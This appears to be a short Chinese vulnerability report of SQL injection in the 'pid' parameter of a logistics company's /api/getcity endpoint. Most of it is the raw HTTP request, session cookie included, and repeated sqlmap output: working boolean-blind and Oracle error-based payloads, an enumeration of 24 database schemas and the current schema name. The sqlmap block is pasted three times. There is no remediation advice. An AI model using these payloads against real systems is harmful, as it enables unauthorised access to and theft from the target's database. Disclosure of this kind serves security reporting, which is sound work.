盛辉物流主站某处sql注入http://www.shenghui56.com/注入产生在此处
POST /api/getcity HTTP/1.1
Host: www.shenghui56.com
Content-Length: 10
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.shenghui56.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.shenghui56.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=F78D3014F8BDECE128318FDC1E83A1CE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1459869997; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1459869997
pid=350000
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:49:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:49:34] [INFO] fetching database (schema) names
[12:49:34] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HD
[*] MDSYS
[*] MWLAPP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SHAC
[*] SHEFFE
[*] SHITEM
[*] SHWLAPP
[*] SMS_XTTX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:49:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:49:34] [INFO] fetching database (schema) names
[12:49:34] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HD
[*] MDSYS
[*] MWLAPP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SHAC
[*] SHEFFE
[*] SHITEM
[*] SHWLAPP
[*] SMS_XTTX
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk
---
[12:51:16] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:51:16] [INFO] fetching current database
[12:51:16] [INFO] resumed: SHWLAPP
current schema (equivalent to database on Oracle): 'SHWLAPP'